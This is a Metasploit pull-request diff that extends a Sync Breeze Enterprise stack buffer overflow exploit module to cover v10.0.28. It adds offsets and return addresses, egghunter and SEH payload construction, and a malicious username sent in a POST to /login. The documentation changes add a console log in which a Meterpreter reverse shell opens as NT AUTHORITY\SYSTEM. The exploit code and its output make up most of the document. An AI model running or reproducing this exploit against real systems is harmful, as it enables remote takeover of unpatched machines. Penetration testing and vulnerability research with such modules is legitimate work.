Land rapid7#9055, Add exploit for Sync Breeze HTTP Server

Land rapid7#9055

Author: wchen-r7

documentation/modules/exploit/windows/http/syncbreeze_bof.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
+[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
 
 ## Verification Steps
   1. Install a vulnerable Sync Breeze Enterprise
@@ -10,13 +10,14 @@
   5. Check `Enable Web Server On Port 80` to start the web interface
   6. Start `msfconsole`
   7. Do `use exploit/windows/http/syncbreeze_bof`
-  8. Do `set RHOST ip`
-  9. Do `check`
-  10. Verify the target is vulnerable
-  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
-  12. Do `set LHOST ip`
-  13. Do `exploit`
-  14. Verify the Meterpreter session is opened
+  8. Select appropriate target via `set target 0` or `set target 1`
+  9. Do `set RHOST ip`
+  10. Do `check`
+  11. Verify the target is vulnerable
+  12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  13. Do `set LHOST ip`
+  14. Do `exploit`
+  15. Verify the Meterpreter session is opened
 
 ## Scenarios
 
@@ -72,3 +73,34 @@ Logged On Users : 3
 Meterpreter     : x86/windows
 meterpreter >
 ```
+
+###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
+
+```
+msf > use exploit/windows/http/syncbreeze_bof 
+msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
+rhost => 192.168.10.61
+msf exploit(syncbreeze_bof) > set target 1
+target => 1
+msf exploit(syncbreeze_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.60:4444 
+[*] Sending request...
+[*] Sending stage (171583 bytes) to 192.168.10.61
+[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
+[+] negotiating tlv encryption
+[+] negotiated tlv encryption
+[+] negotiated tlv encryption
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : MUSHROOMKINGDOM
+OS              : Windows 7 (Build 7600).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

modules/exploits/windows/http/syncbreeze_bof.rb

@@ -15,15 +15,17 @@ def initialize(info = {})
       'Name'           => 'Sync Breeze Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Sync Breeze Enterprise v9.4.28, caused by
-        improper bounds checking of the request path in HTTP GET requests
+        in the web interface of Sync Breeze Enterprise v9.4.28 and v10.0.28, caused by
+        improper bounds checking of the request in HTTP GET and POST requests
         sent to the built-in web server. This module has been tested
         successfully on Windows 7 SP1 x86.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Daniel Teixeira'
+          'Daniel Teixeira',
+          'Andrew Smith', # MSF support for v10.0.28
+          'Owais Mehtab'  # Original v10.0.28 exploit
         ],
       'DefaultOptions' =>
         {
@@ -37,66 +39,127 @@ def initialize(info = {})
         },
       'Targets'        =>
         [
+          [
+            'Automatic', {}
+          ],
           [ 'Sync Breeze Enterprise v9.4.28',
             {
               'Offset' => 2488,
               'Ret'    => 0x10015fde  # POP # POP # RET [libspp.dll]
             }
+          ],
+          [ 'Sync Breeze Enterprise v10.0.28',
+            {
+              'Offset' => 780,
+              'Ret'    => 0x10090c83  # JMP ESP [libspp.dll]
+            }
           ]
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Mar 15 2017',
       'DefaultTarget'  => 0))
   end
 
-  def check
+  def get_product_name
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => '/'
     )
 
     if res && res.code == 200
-      version = res.body[/Sync Breeze Enterprise v[^<]*/]
-      if version
-        vprint_status("Version detected: #{version}")
-        if version =~ /9\.4\.28/
-          return Exploit::CheckCode::Appears
-        end
-        return Exploit::CheckCode::Detected
-      end
-    else
-      vprint_error('Unable to determine due to a HTTP connection timeout')
-      return Exploit::CheckCode::Unknown
+      product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first
+      return product_name if product_name
+    end
+
+    nil
+  end
+
+  def check
+    product_name = get_product_name
+    return Exploit::CheckCode::Unknown unless product_name
+
+    if product_name =~ /9\.4\.28/ || product_name =~ /10\.0\.28/
+      return Exploit::CheckCode::Appears
+    elsif product_name =~ /Sync Breeze Enterprise/
+      return Exploit::CheckCode::Detected
     end
 
     Exploit::CheckCode::Safe
   end
 
+  def get_target_name
+    if target.name != 'Automatic'
+      print_status("Target manually set as #{target.name}")
+      return target
+    else
+      print_status('Automatically detecting target...')
+    end
+
+    case get_product_name
+    when /9\.4\.28/
+      print_status('Target is 9.4.28')
+      return targets[1]
+    when /10\.0\.28/
+      print_status('Target is 10.0.28')
+      return targets[2]
+    else
+      nil
+    end
+  end
+
   def exploit
+    tmp_target = target
+    case get_target_name
+    when targets[1]
+      target = targets[1]
+      eggoptions = {
+        checksum: true,
+        eggtag: rand_text_alpha(4, payload_badchars)
+      }
 
-    eggoptions = {
-      checksum: true,
-      eggtag: rand_text_alpha(4, payload_badchars)
-    }
+      hunter, egg = generate_egghunter(
+        payload.encoded,
+        payload_badchars,
+        eggoptions
+      )
 
-    hunter, egg = generate_egghunter(
-      payload.encoded,
-      payload_badchars,
-      eggoptions
-    )
+      sploit =  rand_text_alpha(target['Offset'])
+      sploit << generate_seh_record(target.ret)
+      sploit << hunter
+      sploit << make_nops(10)
+      sploit << egg
+      sploit << rand_text_alpha(5500)
 
-    sploit =  rand_text_alpha(target['Offset'])
-    sploit << generate_seh_record(target.ret)
-    sploit << hunter
-    sploit << make_nops(10)
-    sploit << egg
-    sploit << rand_text_alpha(5500)
+      print_status('Sending request...')
 
-    print_status('Sending request...')
+      send_request_cgi(
+        'method' => 'GET',
+        'uri'    => sploit
+      )
 
-    send_request_cgi(
-      'method' => 'GET',
-      'uri'    => sploit
-    )
+    when targets[2]
+      target = targets[2]
+      uri = "/login"
+      sploit = rand_text_alpha(target['Offset'])
+      sploit << [target.ret].pack('V')
+      sploit << rand_text(4)
+      make_nops(10)
+      sploit << payload.encoded
+
+      print_status('Sending request...')
+
+      send_request_cgi(
+        'method' => 'POST',
+        'uri'    => uri,
+        'vars_post'     => {
+          'username' => "#{sploit}",
+          'password' => "rawr"
+        }
+      )
+    else
+      print_error("Exploit not suitable for this target.")
+    end
+  ensure
+    target = tmp_target
   end
 end